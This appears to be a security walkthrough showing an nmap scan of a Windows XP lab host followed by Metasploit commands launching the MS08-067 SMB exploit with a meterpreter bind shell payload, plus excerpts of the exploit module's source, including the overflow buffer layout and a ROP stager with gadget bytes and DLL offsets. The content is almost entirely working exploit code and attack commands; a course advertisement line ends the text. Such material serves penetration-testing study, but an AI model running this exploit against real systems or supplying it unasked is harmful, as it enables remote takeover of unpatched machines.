$ nmap -A -O -sV -v 192.168.1.106

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service

OS details: Microsoft Windows XP SP2 or SP3

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| nbstat: NetBIOS name: KALI-C3260A29CC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4a:d0:28 (Oracle VirtualBox virtual NIC)
| Names:
|   KALI-C3260A29CC<00>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   KALI-C3260A29CC<20>  Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: kali-c3260a29cc
|   NetBIOS computer name: KALI-C3260A29CC
|   Workgroup: WORKGROUP
|_  System time: 2017-02-07T17:13:49+08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

$ msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.1.106
> exploit

def exploit 
...
    #
    # Windows XP SP2/SP3 ROP Stager targets
    #
    elsif mytarget['UseROP']

      rop = generate_rop(mytarget['UseROP'])

      path =
        Rex::Text.to_unicode('\\') +

        # This buffer is removed from the front
        Rex::Text.rand_text_alpha(100) +

        # Shellcode
        payload.encoded +

        # Relative path to trigger the bug
        Rex::Text.to_unicode('\\..\\..\\') +

        # Extra padding
        Rex::Text.to_unicode(pad) +

        # ROP Stager
        rop +

        # Padding (skipped)
        Rex::Text.rand_text_alpha(2) +

        # NULL termination
        "\x00" * 2
....

    handle = dcerpc_handle(
      '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )
    dcerpc_bind(handle)
....

def generate_rop 
    free_byte = "\x90"
    # free_byte = "\xcc"

    # create a few small gadgets
    #  <free byte>; pop edx; pop ecx; ret
    gadget1 = free_byte + "\x5a\x59\xc3"
    #  mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
    gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
    #  <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
    gadget3 = "\xcc" + free_byte + "\xeb\x5a"

    # gadget2:
    #  get eax into edi
    #  adjust edi
    #  get 0x7f in ecx
    #  copy the data
    #  jmp to it
    #
    dws = gadget2.unpack('V*')

    ##
    # Create the ROP stager, pfew.. Props to corelanc0d3r!
    # This was no easy task due to space limitations :-/
    # -jduck
    ##
    module_name = 'ACGENRAL.DLL'
    module_base = 0x6f880000

    rvasets = {}

    # XP SP3
    rvasets['5.1.2600.5512'] = {
      # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
      'call_HeapCreate'                          => 0x21286,
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
      'pop ecx / ret'                            => 0x2e796 + 6,
      'mov [eax], ecx / ret'                     => 0xd296,
      'jmp eax'                                  => 0x19c6f,
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
      'mov [eax+0x10], ecx / ret'                => 0x10a56 + 6,
      'add eax, 8 / ret'                         => 0x29c64
    }

    # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
    rop = [
      # prime ebp (adjustment distance)
      0x00018000,

      # get some RWX memory via HeapCreate
      'call_HeapCreate',
      0x01040110, # flOptions (gets & with 0x40005)
      0x01010101,
      0x01010101,

      # adjust the returned pointer
      'add eax, ebp / mov ecx, 0x59ffffa8 / ret',

      # setup gadget1
      'pop ecx / ret',
      gadget1.unpack('V').first,
      'mov [eax], ecx / ret',

      # execute gadget1
      'jmp eax',

      # setup gadget2 (via gadget1)
      dws[0],
      dws[1],
      'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',

      # setup part3 of gadget2
      'pop ecx / ret',
      dws[2],
      'mov [eax+0x10], ecx / ret',

      # execute gadget2
      'add eax, 8 / ret',
      'jmp eax',

      # gadget3 gets executed after gadget2 (luckily)
      gadget3.unpack('V').first
    ]

    # convert the meta rop into concrete bytes
    rvas = rvasets[version]

    rop.map! { |e|
      if e.kind_of? String
        # Meta-replace (RVA)
        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
        module_base + rvas[e]

      elsif e == :unused
        # Randomize
        rand_text(4).unpack('V').first

      else
        # Literal
        e
      end
    }

    ret = rop.pack('V*')

    # check badchars?
    # idx = Rex::Text.badchar_index(ret, payload_badchars)

    ret
  end

[课程]FART 脱壳王！加量不加价！FART作者讲授！